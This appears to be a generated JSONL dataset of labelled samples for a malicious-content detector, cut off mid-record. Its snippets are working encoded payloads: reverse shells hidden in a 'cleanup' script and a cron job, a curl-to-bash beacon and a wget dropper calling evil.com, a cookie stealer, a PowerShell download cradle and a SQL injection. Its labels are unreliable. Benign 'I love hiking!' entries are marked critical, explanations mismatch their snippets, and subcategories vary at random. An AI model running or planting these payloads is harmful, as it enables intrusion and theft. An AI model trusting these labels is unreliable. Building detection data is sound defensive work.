{"id": "hard_obfuscated_attacks_00000", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00001", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.6c7c7129.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00002", "source": "hard_negatives", "source_license": "generated", "text": "var _0x3a2d=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xebec[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00003", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00004", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00005", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00006", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00007", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00008", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00009", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00010", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00011", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00012", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.e97e202e.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00013", "source": "hard_negatives", "source_license": "generated", "text": "var _0xefc9=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6a32[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00014", "source": "hard_negatives", "source_license": "generated", "text": "[2021-09-01 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00015", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00016", "source": "hard_negatives", "source_license": "generated", "text": "var _0xfa65=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xa6fd[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00017", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00018", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00019", "source": "hard_negatives", "source_license": "generated", "text": "var _0xf8bc=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x3c5f[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00020", "source": "hard_negatives", "source_license": "generated", "text": "[2020-11-25 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00021", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00022", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.7c5286eb.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00023", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00024", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.f809dc42.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00025", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00026", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00027", "source": "hard_negatives", "source_license": "generated", "text": "[2022-09-01 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00028", "source": "hard_negatives", "source_license": "generated", "text": "[2026-11-13 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00029", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00030", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00031", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00032", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00033", "source": "hard_negatives", "source_license": "generated", "text": "[2023-02-25 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00034", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00035", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00036", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00037", "source": "hard_negatives", "source_license": "generated", "text": "[2021-04-17 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00038", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00039", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00040", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.b64794a6.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00041", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00042", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00043", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00044", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.35c42a4b.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00045", "source": "hard_negatives", "source_license": "generated", "text": "var _0x8c3f=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x3b2f[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00046", "source": "hard_negatives", "source_license": "generated", "text": "var _0x4a3d=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x5ada[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00047", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00048", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00049", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00050", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00051", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00052", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00053", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00054", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00055", "source": "hard_negatives", "source_license": "generated", "text": "[2021-03-06 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00056", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00057", "source": "hard_negatives", "source_license": "generated", "text": "var _0x0531=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6473[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00058", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.61075ca6.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00059", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00060", "source": "hard_negatives", "source_license": "generated", "text": "var _0xd1c0=[\"\\x65\\x76\\x61\\x6C\"];(function(){var 